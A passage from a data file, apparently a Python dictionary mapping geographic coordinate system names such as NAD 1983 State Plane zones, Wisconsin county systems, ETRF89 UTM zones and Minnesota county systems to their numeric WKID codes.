'NAD_1983_StatePlane_Idaho_East_FIPS_1101_Feet': 102668, 'NAD_1983_StatePlane_Idaho_Central_FIPS_1102_Feet': 102669, 'NAD_1983_StatePlane_Idaho_West_FIPS_1103_Feet': 102670, 'NAD_1983_StatePlane_Illinois_East_FIPS_1201_Feet': 102671, 'NAD_1983_StatePlane_Illinois_West_FIPS_1202_Feet': 102672, 'NAD_1983_StatePlane_Indiana_East_FIPS_1301_Feet': 102673, 'NAD_1983_StatePlane_Indiana_West_FIPS_1302_Feet': 102674, 'NAD_1983_StatePlane_Iowa_North_FIPS_1401_Feet': 102675, 'NAD_1983_StatePlane_Iowa_South_FIPS_1402_Feet': 102676, 'NAD_1983_StatePlane_Kansas_North_FIPS_1501_Feet': 102677, 'NAD_1983_StatePlane_Kansas_South_FIPS_1502_Feet': 102678, 'NAD_1983_StatePlane_Kentucky_North_FIPS_1601_Feet': 102679, 'NAD_1983_StatePlane_Kentucky_South_FIPS_1602_Feet': 102680, 'NAD_1983_StatePlane_Louisiana_North_FIPS_1701_Feet': 102681, 'NAD_1983_StatePlane_Louisiana_South_FIPS_1702_Feet': 102682, 'NAD_1983_StatePlane_Maine_East_FIPS_1801_Feet': 102683, 'NAD_1983_StatePlane_Maine_West_FIPS_1802_Feet': 102684, 'NAD_1983_StatePlane_Maryland_FIPS_1900_Feet': 102685, 'NAD_1983_StatePlane_Massachusetts_Mainland_FIPS_2001_Feet': 102686, 'NAD_1983_StatePlane_Massachusetts_Island_FIPS_2002_Feet': 102687, 'NAD_1983_StatePlane_Michigan_North_FIPS_2111_Feet': 102688, 'NAD_1983_StatePlane_Michigan_Central_FIPS_2112_Feet': 102689, 'NAD_1983_StatePlane_Michigan_South_FIPS_2113_Feet': 102690, 'NAD_1983_StatePlane_Minnesota_North_FIPS_2201_Feet': 102691, 'NAD_1983_StatePlane_Minnesota_Central_FIPS_2202_Feet': 102692, 'NAD_1983_StatePlane_Minnesota_South_FIPS_2203_Feet': 102693, 'NAD_1983_StatePlane_Mississippi_East_FIPS_2301_Feet': 102694, 'NAD_1983_StatePlane_Mississippi_West_FIPS_2302_Feet': 102695, 'NAD_1983_StatePlane_Missouri_East_FIPS_2401_Feet': 102696, 'NAD_1983_StatePlane_Missouri_Central_FIPS_2402_Feet': 102697, 'NAD_1983_StatePlane_Missouri_West_FIPS_2403_Feet': 102698, 'NAD_1983_StatePlane_Montana_FIPS_2500_Feet': 102700, 'NAD_1983_StatePlane_Nebraska_FIPS_2600_Feet': 102704, 
'NAD_1983_StatePlane_Nevada_East_FIPS_2701_Feet': 102707, 'NAD_1983_StatePlane_Nevada_Central_FIPS_2702_Feet': 102708, 'NAD_1983_StatePlane_Nevada_West_FIPS_2703_Feet': 102709, 'NAD_1983_StatePlane_New_Hampshire_FIPS_2800_Feet': 102710, 'NAD_1983_StatePlane_New_Jersey_FIPS_2900_Feet': 102711, 'NAD_1983_StatePlane_New_Mexico_East_FIPS_3001_Feet': 102712, 'NAD_1983_StatePlane_New_Mexico_Central_FIPS_3002_Feet': 102713, 'NAD_1983_StatePlane_New_Mexico_West_FIPS_3003_Feet': 102714, 'NAD_1983_StatePlane_New_York_East_FIPS_3101_Feet': 102715, 'NAD_1983_StatePlane_New_York_Central_FIPS_3102_Feet': 102716, 'NAD_1983_StatePlane_New_York_West_FIPS_3103_Feet': 102717, 'NAD_1983_StatePlane_New_York_Long_Island_FIPS_3104_Feet': 102718, 'NAD_1983_StatePlane_North_Carolina_FIPS_3200_Feet': 102719, 'NAD_1983_StatePlane_North_Dakota_North_FIPS_3301_Feet': 102720, 'NAD_1983_StatePlane_North_Dakota_South_FIPS_3302_Feet': 102721, 'NAD_1983_StatePlane_Ohio_North_FIPS_3401_Feet': 102722, 'NAD_1983_StatePlane_Ohio_South_FIPS_3402_Feet': 102723, 'NAD_1983_StatePlane_Oklahoma_North_FIPS_3501_Feet': 102724, 'NAD_1983_StatePlane_Oklahoma_South_FIPS_3502_Feet': 102725, 'NAD_1983_StatePlane_Oregon_North_FIPS_3601_Feet': 102726, 'NAD_1983_StatePlane_Oregon_South_FIPS_3602_Feet': 102727, 'NAD_1983_StatePlane_Pennsylvania_North_FIPS_3701_Feet': 102728, 'NAD_1983_StatePlane_Pennsylvania_South_FIPS_3702_Feet': 102729, 'NAD_1983_StatePlane_Rhode_Island_FIPS_3800_Feet': 102730, 'NAD_1983_StatePlane_South_Carolina_FIPS_3900_Feet': 102733, 'NAD_1983_StatePlane_South_Dakota_North_FIPS_4001_Feet': 102734, 'NAD_1983_StatePlane_South_Dakota_South_FIPS_4002_Feet': 102735, 'NAD_1983_StatePlane_Tennessee_FIPS_4100_Feet': 102736, 'NAD_1983_StatePlane_Texas_North_FIPS_4201_Feet': 102737, 'NAD_1983_StatePlane_Texas_North_Central_FIPS_4202_Feet': 102738, 'NAD_1983_StatePlane_Texas_Central_FIPS_4203_Feet': 102739, 'NAD_1983_StatePlane_Texas_South_Central_FIPS_4204_Feet': 102740, 
'NAD_1983_StatePlane_Texas_South_FIPS_4205_Feet': 102741, 'NAD_1983_StatePlane_Utah_North_FIPS_4301_Feet': 102742, 'NAD_1983_StatePlane_Utah_Central_FIPS_4302_Feet': 102743, 'NAD_1983_StatePlane_Utah_South_FIPS_4303_Feet': 102744, 'NAD_1983_StatePlane_Vermont_FIPS_4400_Feet': 102745, 'NAD_1983_StatePlane_Virginia_North_FIPS_4501_Feet': 102746, 'NAD_1983_StatePlane_Virginia_South_FIPS_4502_Feet': 102747, 'NAD_1983_StatePlane_Washington_North_FIPS_4601_Feet': 102748, 'NAD_1983_StatePlane_Washington_South_FIPS_4602_Feet': 102749, 'NAD_1983_StatePlane_West_Virginia_North_FIPS_4701_Feet': 102750, 'NAD_1983_StatePlane_West_Virginia_South_FIPS_4702_Feet': 102751, 'NAD_1983_StatePlane_Wisconsin_North_FIPS_4801_Feet': 102752, 'NAD_1983_StatePlane_Wisconsin_Central_FIPS_4802_Feet': 102753, 'NAD_1983_StatePlane_Wisconsin_South_FIPS_4803_Feet': 102754, 'NAD_1983_StatePlane_Wyoming_East_FIPS_4901_Feet': 102755, 'NAD_1983_StatePlane_Wyoming_East_Central_FIPS_4902_Feet': 102756, 'NAD_1983_StatePlane_Wyoming_West_Central_FIPS_4903_Feet': 102757, 'NAD_1983_StatePlane_Wyoming_West_FIPS_4904_Feet': 102758, 'NAD_1983_StatePlane_Puerto_Rico_Virgin_Islands_FIPS_5200_Feet': 102761, 'NAD_1983_StatePlane_Kentucky_FIPS_1600_Feet': 102763, 'NAD_1983_StatePlane_Guam_FIPS_5400_Feet': 102766, 'NAD_1983_HARN_WISCRS_Adams_County_Meters': 103300, 'NAD_1983_HARN_WISCRS_Ashland_County_Meters': 103301, 'NAD_1983_HARN_WISCRS_Barron_County_Meters': 103302, 'NAD_1983_HARN_WISCRS_Bayfield_County_Meters': 103303, 'NAD_1983_HARN_WISCRS_Brown_County_Meters': 103304, 'NAD_1983_HARN_WISCRS_Buffalo_County_Meters': 103305, 'NAD_1983_HARN_WISCRS_Burnett_County_Meters': 103306, 'NAD_1983_HARN_WISCRS_Calumet_County_Meters': 103307, 'NAD_1983_HARN_WISCRS_Chippewa_County_Meters': 103308, 'NAD_1983_HARN_WISCRS_Clark_County_Meters': 103309, 'NAD_1983_HARN_WISCRS_Columbia_County_Meters': 103310, 'NAD_1983_HARN_WISCRS_Crawford_County_Meters': 103311, 'NAD_1983_HARN_WISCRS_Dane_County_Meters': 103312, 
'NAD_1983_HARN_WISCRS_Dodge_County_Meters': 103313, 'NAD_1983_HARN_WISCRS_Door_County_Meters': 103314, 'NAD_1983_HARN_WISCRS_Douglas_County_Meters': 103315, 'NAD_1983_HARN_WISCRS_Dunn_County_Meters': 103316, 'NAD_1983_HARN_WISCRS_EauClaire_County_Meters': 103317, 'NAD_1983_HARN_WISCRS_Florence_County_Meters': 103318, 'NAD_1983_HARN_WISCRS_Fond_du_Lac_County_Meters': 103319, 'NAD_1983_HARN_WISCRS_Forest_County_Meters': 103320, 'NAD_1983_HARN_WISCRS_Grant_County_Meters': 103321, 'NAD_1983_HARN_WISCRS_Green_County_Meters': 103322, 'NAD_1983_HARN_WISCRS_GreenLake_County_Meters': 103323, 'NAD_1983_HARN_WISCRS_Iowa_County_Meters': 103324, 'NAD_1983_HARN_WISCRS_Iron_County_Meters': 103325, 'NAD_1983_HARN_WISCRS_Jackson_County_Meters': 103326, 'NAD_1983_HARN_WISCRS_Jefferson_County_Meters': 103327, 'NAD_1983_HARN_WISCRS_Juneau_County_Meters': 103328, 'NAD_1983_HARN_WISCRS_Kenosha_County_Meters': 103329, 'NAD_1983_HARN_WISCRS_Kewaunee_County_Meters': 103330, 'NAD_1983_HARN_WISCRS_LaCrosse_County_Meters': 103331, 'NAD_1983_HARN_WISCRS_Lafayette_County_Meters': 103332, 'NAD_1983_HARN_WISCRS_Langlade_County_Meters': 103333, 'NAD_1983_HARN_WISCRS_Lincoln_County_Meters': 103334, 'NAD_1983_HARN_WISCRS_Manitowoc_County_Meters': 103335, 'NAD_1983_HARN_WISCRS_Marathon_County_Meters': 103336, 'NAD_1983_HARN_WISCRS_Marinette_County_Meters': 103337, 'NAD_1983_HARN_WISCRS_Marquette_County_Meters': 103338, 'NAD_1983_HARN_WISCRS_Menominee_County_Meters': 103339, 'NAD_1983_HARN_WISCRS_Milwaukee_County_Meters': 103340, 'NAD_1983_HARN_WISCRS_Monroe_County_Meters': 103341, 'NAD_1983_HARN_WISCRS_Oconto_County_Meters': 103342, 'NAD_1983_HARN_WISCRS_Oneida_County_Meters': 103343, 'NAD_1983_HARN_WISCRS_Outagamie_County_Meters': 103344, 'NAD_1983_HARN_WISCRS_Ozaukee_County_Meters': 103345, 'NAD_1983_HARN_WISCRS_Pepin_County_Meters': 103346, 'NAD_1983_HARN_WISCRS_Pierce_County_Meters': 103347, 'NAD_1983_HARN_WISCRS_Polk_County_Meters': 103348, 'NAD_1983_HARN_WISCRS_Portage_County_Meters': 103349, 
'NAD_1983_HARN_WISCRS_Price_County_Meters': 103350, 'NAD_1983_HARN_WISCRS_Racine_County_Meters': 103351, 'NAD_1983_HARN_WISCRS_Richland_County_Meters': 103352, 'NAD_1983_HARN_WISCRS_Rock_County_Meters': 103353, 'NAD_1983_HARN_WISCRS_Rusk_County_Meters': 103354, 'NAD_1983_HARN_WISCRS_Sauk_County_Meters': 103355, 'NAD_1983_HARN_WISCRS_Sawyer_County_Meters': 103356, 'NAD_1983_HARN_WISCRS_Shawano_County_Meters': 103357, 'NAD_1983_HARN_WISCRS_Sheboygan_County_Meters': 103358, 'NAD_1983_HARN_WISCRS_St_Croix_County_Meters': 103359, 'NAD_1983_HARN_WISCRS_Taylor_County_Meters': 103360, 'NAD_1983_HARN_WISCRS_Trempealeau_County_Meters': 103361, 'NAD_1983_HARN_WISCRS_Vernon_County_Meters': 103362, 'NAD_1983_HARN_WISCRS_Vilas_County_Meters': 103363, 'NAD_1983_HARN_WISCRS_Walworth_County_Meters': 103364, 'NAD_1983_HARN_WISCRS_Washburn_County_Meters': 103365, 'NAD_1983_HARN_WISCRS_Washington_County_Meters': 103366, 'NAD_1983_HARN_WISCRS_Waukesha_County_Meters': 103367, 'NAD_1983_HARN_WISCRS_Waupaca_County_Meters': 103368, 'NAD_1983_HARN_WISCRS_Waushara_County_Meters': 103369, 'NAD_1983_HARN_WISCRS_Winnebago_County_Meters': 103370, 'NAD_1983_HARN_WISCRS_Wood_County_Meters': 103371, 'NAD_1983_HARN_WISCRS_Adams_County_Feet': 103400, 'NAD_1983_HARN_WISCRS_Ashland_County_Feet': 103401, 'NAD_1983_HARN_WISCRS_Barron_County_Feet': 103402, 'NAD_1983_HARN_WISCRS_Bayfield_County_Feet': 103403, 'NAD_1983_HARN_WISCRS_Brown_County_Feet': 103404, 'NAD_1983_HARN_WISCRS_Buffalo_County_Feet': 103405, 'NAD_1983_HARN_WISCRS_Burnett_County_Feet': 103406, 'NAD_1983_HARN_WISCRS_Calumet_County_Feet': 103407, 'NAD_1983_HARN_WISCRS_Chippewa_County_Feet': 103408, 'NAD_1983_HARN_WISCRS_Clark_County_Feet': 103409, 'NAD_1983_HARN_WISCRS_Columbia_County_Feet': 103410, 'NAD_1983_HARN_WISCRS_Crawford_County_Feet': 103411, 'NAD_1983_HARN_WISCRS_Dane_County_Feet': 103412, 'NAD_1983_HARN_WISCRS_Dodge_County_Feet': 103413, 'NAD_1983_HARN_WISCRS_Door_County_Feet': 103414, 'NAD_1983_HARN_WISCRS_Douglas_County_Feet': 
103415, 'NAD_1983_HARN_WISCRS_Dunn_County_Feet': 103416, 'NAD_1983_HARN_WISCRS_EauClaire_County_Feet': 103417, 'NAD_1983_HARN_WISCRS_Florence_County_Feet': 103418, 'NAD_1983_HARN_WISCRS_Fond_du_Lac_County_Feet': 103419, 'NAD_1983_HARN_WISCRS_Forest_County_Feet': 103420, 'NAD_1983_HARN_WISCRS_Grant_County_Feet': 103421, 'NAD_1983_HARN_WISCRS_Green_County_Feet': 103422, 'NAD_1983_HARN_WISCRS_GreenLake_County_Feet': 103423, 'NAD_1983_HARN_WISCRS_Iowa_County_Feet': 103424, 'NAD_1983_HARN_WISCRS_Iron_County_Feet': 103425, 'NAD_1983_HARN_WISCRS_Jackson_County_Feet': 103426, 'NAD_1983_HARN_WISCRS_Jefferson_County_Feet': 103427, 'NAD_1983_HARN_WISCRS_Juneau_County_Feet': 103428, 'NAD_1983_HARN_WISCRS_Kenosha_County_Feet': 103429, 'NAD_1983_HARN_WISCRS_Kewaunee_County_Feet': 103430, 'NAD_1983_HARN_WISCRS_LaCrosse_County_Feet': 103431, 'NAD_1983_HARN_WISCRS_Lafayette_County_Feet': 103432, 'NAD_1983_HARN_WISCRS_Langlade_County_Feet': 103433, 'NAD_1983_HARN_WISCRS_Lincoln_County_Feet': 103434, 'NAD_1983_HARN_WISCRS_Manitowoc_County_Feet': 103435, 'NAD_1983_HARN_WISCRS_Marathon_County_Feet': 103436, 'NAD_1983_HARN_WISCRS_Marinette_County_Feet': 103437, 'NAD_1983_HARN_WISCRS_Marquette_County_Feet': 103438, 'NAD_1983_HARN_WISCRS_Menominee_County_Feet': 103439, 'NAD_1983_HARN_WISCRS_Milwaukee_County_Feet': 103440, 'NAD_1983_HARN_WISCRS_Monroe_County_Feet': 103441, 'NAD_1983_HARN_WISCRS_Oconto_County_Feet': 103442, 'NAD_1983_HARN_WISCRS_Oneida_County_Feet': 103443, 'NAD_1983_HARN_WISCRS_Outagamie_County_Feet': 103444, 'NAD_1983_HARN_WISCRS_Ozaukee_County_Feet': 103445, 'NAD_1983_HARN_WISCRS_Pepin_County_Feet': 103446, 'NAD_1983_HARN_WISCRS_Pierce_County_Feet': 103447, 'NAD_1983_HARN_WISCRS_Polk_County_Feet': 103448, 'NAD_1983_HARN_WISCRS_Portage_County_Feet': 103449, 'NAD_1983_HARN_WISCRS_Price_County_Feet': 103450, 'NAD_1983_HARN_WISCRS_Racine_County_Feet': 103451, 'NAD_1983_HARN_WISCRS_Richland_County_Feet': 103452, 'NAD_1983_HARN_WISCRS_Rock_County_Feet': 103453, 
'NAD_1983_HARN_WISCRS_Rusk_County_Feet': 103454, 'NAD_1983_HARN_WISCRS_Sauk_County_Feet': 103455, 'NAD_1983_HARN_WISCRS_Sawyer_County_Feet': 103456, 'NAD_1983_HARN_WISCRS_Shawano_County_Feet': 103457, 'NAD_1983_HARN_WISCRS_Sheboygan_County_Feet': 103458, 'NAD_1983_HARN_WISCRS_St_Croix_County_Feet': 103459, 'NAD_1983_HARN_WISCRS_Taylor_County_Feet': 103460, 'NAD_1983_HARN_WISCRS_Trempealeau_County_Feet': 103461, 'NAD_1983_HARN_WISCRS_Vernon_County_Feet': 103462, 'NAD_1983_HARN_WISCRS_Vilas_County_Feet': 103463, 'NAD_1983_HARN_WISCRS_Walworth_County_Feet': 103464, 'NAD_1983_HARN_WISCRS_Washburn_County_Feet': 103465, 'NAD_1983_HARN_WISCRS_Washington_County_Feet': 103466, 'NAD_1983_HARN_WISCRS_Waukesha_County_Feet': 103467, 'NAD_1983_HARN_WISCRS_Waupaca_County_Feet': 103468, 'NAD_1983_HARN_WISCRS_Waushara_County_Feet': 103469, 'NAD_1983_HARN_WISCRS_Winnebago_County_Feet': 103470, 'NAD_1983_HARN_WISCRS_Wood_County_Feet': 103471, 'ETRF_1989_UTM_Zone_28N': 103528, 'ETRF_1989_UTM_Zone_29N': 103529, 'ETRF_1989_UTM_Zone_30N': 103530, 'ETRF_1989_UTM_Zone_31N': 103531, 'ETRF_1989_UTM_Zone_32N': 103532, 'ETRF_1989_UTM_Zone_33N': 103533, 'ETRF_1989_UTM_Zone_34N': 103534, 'ETRF_1989_UTM_Zone_35N': 103535, 'ETRF_1989_UTM_Zone_36N': 103536, 'ETRF_1989_UTM_Zone_37N': 103537, 'ETRF_1989_UTM_Zone_38N': 103538, 'ETRF_1989_TM_Baltic_1993': 103584, 'NAD_1983_HARN_Adj_MN_Aitkin_Meters': 103600, 'NAD_1983_HARN_Adj_MN_Clay_Meters': 103601, 'NAD_1983_HARN_Adj_MN_Clearwater_Meters': 103602, 'NAD_1983_HARN_Adj_MN_Hubbard_Meters': 103603, 'NAD_1983_HARN_Adj_MN_Lake_Meters': 103604, 'NAD_1983_HARN_Adj_MN_Mille_Lacs_Meters': 103605, 'NAD_1983_HARN_Adj_MN_Washington_Meters': 103606, 'NAD_1983_HARN_Adj_MN_Wilkin_Meters': 103607, 'NAD_1983_HARN_Adj_MN_Anoka_Meters': 103608, 'NAD_1983_HARN_Adj_MN_Becker_Meters': 103609, 'NAD_1983_HARN_Adj_MN_Beltrami_North_Meters': 103610, 'NAD_1983_HARN_Adj_MN_Beltrami_South_Meters': 103611, 'NAD_1983_HARN_Adj_MN_Benton_Meters': 103612, 
'NAD_1983_HARN_Adj_MN_Big_Stone_Meters': 103613, 'NAD_1983_HARN_Adj_MN_Blue_Earth_Meters': 103614, 'NAD_1983_HARN_Adj_MN_Brown_Meters': 103615, 'NAD_1983_HARN_Adj_MN_Carlton_Meters': 103616, 'NAD_1983_HARN_Adj_MN_Carver_Meters': 103617, 'NAD_1983_HARN_Adj_MN_Cass_North_Meters': 103618, 'NAD_1983_HARN_Adj_MN_Cass_South_Meters': 103619, 'NAD_1983_HARN_Adj_MN_Chippewa_Meters': 103620, 'NAD_1983_HARN_Adj_MN_Chisago_Meters': 103621, 'NAD_1983_HARN_Adj_MN_Cook_North_Meters': 103622, 'NAD_1983_HARN_Adj_MN_Cook_South_Meters': 103623, 'NAD_1983_HARN_Adj_MN_Cottonwood_Meters': 103624, 'NAD_1983_HARN_Adj_MN_Crow_Wing_Meters': 103625, 'NAD_1983_HARN_Adj_MN_Dakota_Meters': 103626, 'NAD_1983_HARN_Adj_MN_Dodge_Meters': 103627, 'NAD_1983_HARN_Adj_MN_Douglas_Meters': 103628, 'NAD_1983_HARN_Adj_MN_Faribault_Meters': 103629, 'NAD_1983_HARN_Adj_MN_Fillmore_Meters': 103630, 'NAD_1983_HARN_Adj_MN_Freeborn_Meters': 103631, 'NAD_1983_HARN_Adj_MN_Goodhue_Meters': 103632, 'NAD_1983_HARN_Adj_MN_Grant_Meters': 103633, 'NAD_1983_HARN_Adj_MN_Hennepin_Meters': 103634, 'NAD_1983_HARN_Adj_MN_Houston_Meters': 103635, 'NAD_1983_HARN_Adj_MN_Isanti_Meters': 103636, 'NAD_1983_HARN_Adj_MN_Itasca_North_Meters': 103637, 'NAD_1983_HARN_Adj_MN_Itasca_South_Meters': 103638, 'NAD_1983_HARN_Adj_MN_Jackson_Meters': 103639, 'NAD_1983_HARN_Adj_MN_Kanabec_Meters': 103640, 'NAD_1983_HARN_Adj_MN_Kandiyohi_Meters': 103641, 'NAD_1983_HARN_Adj_MN_Kittson_Meters': 103642, 'NAD_1983_HARN_Adj_MN_Koochiching_Meters': 103643, 'NAD_1983_HARN_Adj_MN_Lac_Qui_Parle_Meters': 103644, 'NAD_1983_HARN_Adj_MN_Lake_of_the_Woods_North_Meters': 103645, 'NAD_1983_HARN_Adj_MN_Lake_of_the_Woods_South_Meters': 103646, 'NAD_1983_HARN_Adj_MN_Le_Sueur_Meters': 103647, 'NAD_1983_HARN_Adj_MN_Lincoln_Meters': 103648, 'NAD_1983_HARN_Adj_MN_Lyon_Meters': 103649, 'NAD_1983_HARN_Adj_MN_McLeod_Meters': 103650, 'NAD_1983_HARN_Adj_MN_Mahnomen_Meters': 103651, 'NAD_1983_HARN_Adj_MN_Marshall_Meters': 103652, 'NAD_1983_HARN_Adj_MN_Martin_Meters': 103653, 
'NAD_1983_HARN_Adj_MN_Meeker_Meters': 103654, 'NAD_1983_HARN_Adj_MN_Morrison_Meters': 103655, 'NAD_1983_HARN_Adj_MN_Mower_Meters': 103656, 'NAD_1983_HARN_Adj_MN_Murray_Meters': 103657, 'NAD_1983_HARN_Adj_MN_Nicollet_Meters': 103658, 'NAD_1983_HARN_Adj_MN_Nobles_Meters': 103659, 'NAD_1983_HARN_Adj_MN_Norman_Meters': 103660, 'NAD_1983_HARN_Adj_MN_Olmsted_Meters': 103661, 'NAD_1983_HARN_Adj_MN_Ottertail_Meters': 103662, 'NAD_1983_HARN_Adj_MN_Pennington_Meters': 103663, 'NAD_1983_HARN_Adj_MN_Pine_Meters': 103664, 'NAD_1983_HARN_Adj_MN_Pipestone_Meters': 103665, 'NAD_1983_HARN_Adj_MN_Polk_Meters': 103666, 'NAD_1983_HARN_Adj_MN_Pope_Meters': 103667, 'NAD_1983_HARN_Adj_MN_Ramsey_Meters': 103668, 'NAD_1983_HARN_Adj_MN_Red_Lake_Meters': 103669, 'NAD_1983_HARN_Adj_MN_Redwood_Meters': 103670, 'NAD_1983_HARN_Adj_MN_Renville_Meters': 103671, 'NAD_1983_HARN_Adj_MN_Rice_Meters': 103672, 'NAD_1983_HARN_Adj_MN_Rock_Meters': 103673, 'NAD_1983_HARN_Adj_MN_Roseau_Meters': 103674, 'NAD_1983_HARN_Adj_MN_St_Louis_North_Meters': 103675, 'NAD_1983_HARN_Adj_MN_St_Louis_Central_Meters': 103676, 'NAD_1983_HARN_Adj_MN_St_Louis_South_Meters': 103677, 'NAD_1983_HARN_Adj_MN_Scott_Meters': 103678, 'NAD_1983_HARN_Adj_MN_Sherburne_Meters': 103679, 'NAD_1983_HARN_Adj_MN_Sibley_Meters': 103680, 'NAD_1983_HARN_Adj_MN_Stearns_Meters': 103681, 'NAD_1983_HARN_Adj_MN_Steele_Meters': 103682, 'NAD_1983_HARN_Adj_MN_Stevens_Meters': 103683, 'NAD_1983_HARN_Adj_MN_Swift_Meters': 103684, 'NAD_1983_HARN_Adj_MN_Todd_Meters': 103685, 'NAD_1983_HARN_Adj_MN_Traverse_Meters': 103686, 'NAD_1983_HARN_Adj_MN_Wabasha_Meters': 103687, 'NAD_1983_HARN_Adj_MN_Wadena_Meters': 103688, 'NAD_1983_HARN_Adj_MN_Waseca_Meters': 103689, 'NAD_1983_HARN_Adj_MN_Watonwan_Meters': 103690, 'NAD_1983_HARN_Adj_MN_Winona_Meters': 103691, 'NAD_1983_HARN_Adj_MN_Wright_Meters': 103692, 'NAD_1983_HARN_Adj_MN_Yellow_Medicine_Meters': 103693, 'NAD_1983_HARN_Adj_MN_Aitkin_Feet': 103700, 'NAD_1983_HARN_Adj_MN_Clay_Feet': 103701, 
'NAD_1983_HARN_Adj_MN_Clearwater_Feet': 103702, 'NAD_1983_HARN_Adj_MN_Hubbard_Feet': 103703, 'NAD_1983_HARN_Adj_MN_Lake_Feet': 103704, 'NAD_1983_HARN_Adj_MN_Mille_Lacs_Feet': 103705, 'NAD_1983_HARN_Adj_MN_Washington_Feet': 103706, 'NAD_1983_HARN_Adj_MN_Wilkin_Feet': 103707, 'NAD_1983_HARN_Adj_MN_Anoka_Feet': 103708, 'NAD_1983_HARN_Adj_MN_Becker_Feet': 103709, 'NAD_1983_HARN_Adj_MN_Beltrami_North_Feet': 103710, 'NAD_1983_HARN_Adj_MN_Beltrami_South_Feet': 103711, 'NAD_1983_HARN_Adj_MN_Benton_Feet': 103712, 'NAD_1983_HARN_Adj_MN_Big_Stone_Feet': 103713, 'NAD_1983_HARN_Adj_MN_Blue_Earth_Feet': 103714, 'NAD_1983_HARN_Adj_MN_Brown_Feet': 103715, 'NAD_1983_HARN_Adj_MN_Carlton_Feet': 103716, 'NAD_1983_HARN_Adj_MN_Carver_Feet': 103717, 'NAD_1983_HARN_Adj_MN_Cass_North_Feet': 103718, 'NAD_1983_HARN_Adj_MN_Cass_South_Feet': 103719, 'NAD_1983_HARN_Adj_MN_Chippewa_Feet': 103720, 'NAD_1983_HARN_Adj_MN_Chisago_Feet': 103721, 'NAD_1983_HARN_Adj_MN_Cook_North_Feet': 103722, 'NAD_1983_HARN_Adj_MN_Cook_South_Feet': 103723, 'NAD_1983_HARN_Adj_MN_Cottonwood_Feet': 103724, 'NAD_1983_HARN_Adj_MN_Crow_Wing_Feet': 103725, 'NAD_1983_HARN_Adj_MN_Dakota_Feet': 103726, 'NAD_1983_HARN_Adj_MN_Dodge_Feet': 103727, 'NAD_1983_HARN_Adj_MN_Douglas_Feet': 103728, 'NAD_1983_HARN_Adj_MN_Faribault_Feet': 103729, 'NAD_1983_HARN_Adj_MN_Fillmore_Feet': 103730, 'NAD_1983_HARN_Adj_MN_Freeborn_Feet': 103731, 'NAD_1983_HARN_Adj_MN_Goodhue_Feet': 103732, 'NAD_1983_HARN_Adj_MN_Grant_Feet': 103733, 'NAD_1983_HARN_Adj_MN_Hennepin_Feet': 103734, 'NAD_1983_HARN_Adj_MN_Houston_Feet': 103735, 'NAD_1983_HARN_Adj_MN_Isanti_Feet': 103736, 'NAD_1983_HARN_Adj_MN_Itasca_North_Feet': 103737, 'NAD_1983_HARN_Adj_MN_Itasca_South_Feet': 103738, 'NAD_1983_HARN_Adj_MN_Jackson_Feet': 103739, 'NAD_1983_HARN_Adj_MN_Kanabec_Feet': 103740, 'NAD_1983_HARN_Adj_MN_Kandiyohi_Feet': 103741, 'NAD_1983_HARN_Adj_MN_Kittson_Feet': 103742, 'NAD_1983_HARN_Adj_MN_Koochiching_Feet': 103743, 'NAD_1983_HARN_Adj_MN_Lac_Qui_Parle_Feet': 103744, 
'NAD_1983_HARN_Adj_MN_Lake_of_the_Woods_North_Feet': 103745, 'NAD_1983_HARN_Adj_MN_Lake_of_the_Woods_South_Feet': 103746, 'NAD_1983_HARN_Adj_MN_Le_Sueur_Feet': 103747, 'NAD_1983_HARN_Adj_MN_Lincoln_Feet': 103748, 'NAD_1983_HARN_Adj_MN_Lyon_Feet': 103749, 'NAD_1983_HARN_Adj_MN_McLeod_Feet': 103750, 'NAD_1983_HARN_Adj_MN_Mahnomen_Feet': 103751, 'NAD_1983_HARN_Adj_MN_Marshall_Feet': 103752, 'NAD_1983_HARN_Adj_MN_Martin_Feet': 103753, 'NAD_1983_HARN_Adj_MN_Meeker_Feet': 103754, 'NAD_1983_HARN_Adj_MN_Morrison_Feet': 103755, 'NAD_1983_HARN_Adj_MN_Mower_Feet': 103756, 'NAD_1983_HARN_Adj_MN_Murray_Feet': 103757, 'NAD_1983_HARN_Adj_MN_Nicollet_Feet': 103758, 'NAD_1983_HARN_Adj_MN_Nobles_Feet': 103759, 'NAD_1983_HARN_Adj_MN_Norman_Feet': 103760, 'NAD_1983_HARN_Adj_MN_Olmsted_Feet': 103761, 'NAD_1983_HARN_Adj_MN_Ottertail_Feet': 103762, 'NAD_1983_HARN_Adj_MN_Pennington_Feet': 103763, 'NAD_1983_HARN_Adj_MN_Pine_Feet': 103764, 'NAD_1983_HARN_Adj_MN_Pipestone_Feet': 103765, 'NAD_1983_HARN_Adj_MN_Polk_Feet': 103766, 'NAD_1983_HARN_Adj_MN_Pope_Feet': 103767, 'NAD_1983_HARN_Adj_MN_Ramsey_Feet': 103768, 'NAD_1983_HARN_Adj_MN_Red_Lake_Feet': 103769, 'NAD_1983_HARN_Adj_MN_Redwood_Feet': 103770, 'NAD_1983_HARN_Adj_MN_Renville_Feet': 103771, 'NAD_1983_HARN_Adj_MN_Rice_Feet': 103772, 'NAD_1983_HARN_Adj_MN_Rock_Feet': 103773, 'NAD_1983_HARN_Adj_MN_Roseau_Feet': 103774, 'NAD_1983_HARN_Adj_MN_St_Louis_North_Feet': 103775, 'NAD_1983_HARN_Adj_MN_St_Louis_Central_Feet': 103776, 'NAD_1983_HARN_Adj_MN_St_Louis_South_Feet': 103777, 'NAD_1983_HARN_Adj_MN_Scott_Feet': 103778, 'NAD_1983_HARN_Adj_MN_Sherburne_Feet': 103779, 'NAD_1983_HARN_Adj_MN_Sibley_Feet': 103780, 'NAD_1983_HARN_Adj_MN_Stearns_Feet': 103781, 'NAD_1983_HARN_Adj_MN_Steele_Feet': 103782, 'NAD_1983_HARN_Adj_MN_Stevens_Feet': 103783, 'NAD_1983_HARN_Adj_MN_Swift_Feet': 103784, 'NAD_1983_HARN_Adj_MN_Todd_Feet': 103785, 'NAD_1983_HARN_Adj_MN_Traverse_Feet': 103786, 'NAD_1983_HARN_Adj_MN_Wabasha_Feet': 103787, 
